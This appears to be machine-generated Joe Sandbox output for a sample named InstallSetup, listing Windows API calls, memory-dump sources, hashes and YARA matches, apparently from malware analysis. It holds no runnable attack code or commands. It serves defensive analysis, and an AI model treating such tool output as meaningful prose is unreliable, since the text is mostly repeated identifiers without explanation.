                                                                                                • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0094DAD7), ref: 0096A732
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0094DAD7), ref: 0096A73C
                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0094DAD7), ref: 0096A749
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                • Instruction ID: 428257759de9c0c76af4c0856fd5ee8e7a5513391c93ddd2366eb7baebc9e575
                                                                                                • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                • Instruction Fuzzy Hash: C131B37490131C9BCB21DF64D989B9CBBB8BF48711F5042EAE80CA7261E7309F858F45
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,0097009C,00000000,00457970,0000000C,009701F3,00000000,00000002,00000000), ref: 009700E7
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0097009C,00000000,00457970,0000000C,009701F3,00000000,00000002,00000000), ref: 009700EE
                                                                                                • ExitProcess.KERNEL32 ref: 00970100
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction ID: 117d24cdf5fb5edefe51384678a365b7fcd2d0c1339a7757fa6838ef30dd8fe2
                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction Fuzzy Hash: 08E0B636000648EBCF11AF94DD09B593B69FB86B52F108024F9098B131CB76EE42DA44
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                • API String ID: 0-2784972518
                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction ID: 1881473ebb8cc92b2ed4aa44de7bd22430dcd9ab104b5d0f7d18c9599c015af2
                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction Fuzzy Hash: C4316BB6910609DFDB10CF99C880AAEBBF9FF88324F24404AD941A7351D775EA45CFA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /
                                                                                                • API String ID: 0-2043925204
                                                                                                • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                • Instruction ID: 563932776666e6211f3f87e4b0b5d97461f39c6889b6dc5427425fc23b936ab1
                                                                                                • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                • Instruction Fuzzy Hash: 9F412873540219AFCB209FB9CC4DEAB777CEB80710F1486A9F909D7180EA319D41CB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: /
                                                                                                • API String ID: 0-2043925204
                                                                                                • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                • Instruction ID: 0afedf8882a017107d659bbc94b6079ebba79827d27c7de93e2fa1c95c8beb1f
                                                                                                • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                • Instruction Fuzzy Hash: 36023C71E002199FDF14CFA9D9906ADBBF5EF88314F25816AE819E7380D731AD41CB80
                                                                                                APIs
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0094262C
                                                                                                • PostQuitMessage.USER32(00000000), ref: 009427CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4264772764-0
                                                                                                • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                • Instruction ID: 2ccd396383c974b82947d6f3b9a2ba7be3c53a44d28496a3bc317a328ae968d9
                                                                                                • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                • Instruction Fuzzy Hash: E6412F25A64384A5E731FFA5BC45B2537B4FF64722F10252BE528CB2B2E3B28540C75E
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00976F21,?,?,00000008,?,?,0097F3E2,00000000), ref: 00977153
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction ID: 117526904f92a134fc5b404cceab00a618926cd756111b483f802db34151f789
                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction Fuzzy Hash: F6B14B322146089FD715CF68C48AB65BBE1FF45364F69C658E89DCF2A1C335E991CB40
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097B900
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                • Instruction ID: d32ab611c236f1c82c1eef8d99b45415b4ee4f14b00c04bc7d69304886c1b437
                                                                                                • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                • Instruction Fuzzy Hash: D221AF3395020AABDB24AF24DC46BBA73ACEF41318F10817AEF19D6191EB39DD44CB50
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,00970A1C,?,0097BC89,00000000,?,?,?), ref: 0097B5A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                • Instruction ID: aded6ab1230c9ea2e36cc7c6c8b90f0057825cd11b4550ea9e600a5c58c54a78
                                                                                                • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                • Instruction Fuzzy Hash: 88110C3B2047059FDB189F39C89177ABB95FF84758B15882DEA4A87640D771B942CB40
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0097B87A,00000000,00000000,?), ref: 0097BB08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                • String ID:
                                                                                                • API String ID: 787680540-0
                                                                                                • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                • Instruction ID: fa152d8a7238bcfbefeea035595431ef022d894aeda3beb01882969ce8f81f90
                                                                                                • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                • Instruction Fuzzy Hash: 0CF0F433A10119ABDB289B24CC45BBAB76CEB40764F158469ED0EA3144EB74BE0286D0
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                • String ID:
                                                                                                • API String ID: 787680540-0
                                                                                                • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097B900
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2955987475-0
                                                                                                • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                • Instruction ID: 1e8e37f2ca4ee700598b9ba113929b461bead2fb3c0afe95ad99c0a1fd659ca6
                                                                                                • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                • Instruction Fuzzy Hash: B5012633A551059BCB14AF34DC81BBA33A8EF45311B0481BAEF0ADB282DA355D048750
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,00970A1C,?,0097BC4D,00970A1C,?,?,?,?,?,00970A1C,?,?), ref: 0097B61B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                • Instruction ID: 8c0cfcfd4efb4c20432a2ab574786e866ccb3c084d1e16654bdb74bdec4f9d83
                                                                                                • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                • Instruction Fuzzy Hash: EBF0C2373007085FDB246F39DC81B7A7B95EF81768F15842DFA098B651D7719C028644
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                • String ID:
                                                                                                • API String ID: 2016158738-0
                                                                                                • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0097047A,?,00000004), ref: 0097547A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                • Instruction ID: 0a46b5617a95fdf8bc16e74955067f1615319d6c05de42b32db4e963248f32de
                                                                                                • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                • Instruction Fuzzy Hash: 52F02B32680318BFDB016F50CC02F6E7B65EF44B02F518115FC0966190DAB19D20A689
                                                                                                APIs
                                                                                                  • Part of subcall function 0096E654: RtlEnterCriticalSection.NTDLL(004F0DAF), ref: 0096E663
                                                                                                • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0097506C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                • Instruction ID: 8e73c68774eb0b479f74e30899e8c5b82aef6f77d05ed9ba5d209cbd5ff4dbf7
                                                                                                • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                • Instruction Fuzzy Hash: B4F04F36A10304DFE710EF68D906B5D77E0EF85722F104166F904DB2E6C7759954CB49
                                                                                                APIs
                                                                                                  • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
